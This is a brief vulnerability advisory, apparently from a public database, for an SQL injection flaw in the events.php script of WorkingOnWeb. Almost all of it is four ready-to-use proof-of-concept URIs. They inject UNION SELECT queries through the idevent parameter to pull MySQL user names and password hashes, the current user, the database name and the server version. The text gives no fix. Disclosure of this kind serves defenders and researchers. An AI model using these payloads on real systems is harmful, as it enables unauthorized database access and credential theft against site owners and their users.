WorkingOnWeb Events.PHP SQL Injection Vulnerability

WorkingOnWeb Events.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/events.php?idevent=-1/**/union/**/select/**/concat(user,0x203a3a20,password),null,0,0,0,0,0,0,0/**/from/**/mysql.user/*
http://www.example.com/events.php?idevent=-1/**/union/**/select/**/user(),2,3,4,1,1,1,1,1/*
http://www.example.com/events.php?idevent=-1/**/union/**/select/**/database(),2,3,4,1,1,1,1,1/*
http://www.example.com/events.php?idevent=-1/**/union/**/select/**/version(),2,3,4,1,1,1,1,1/*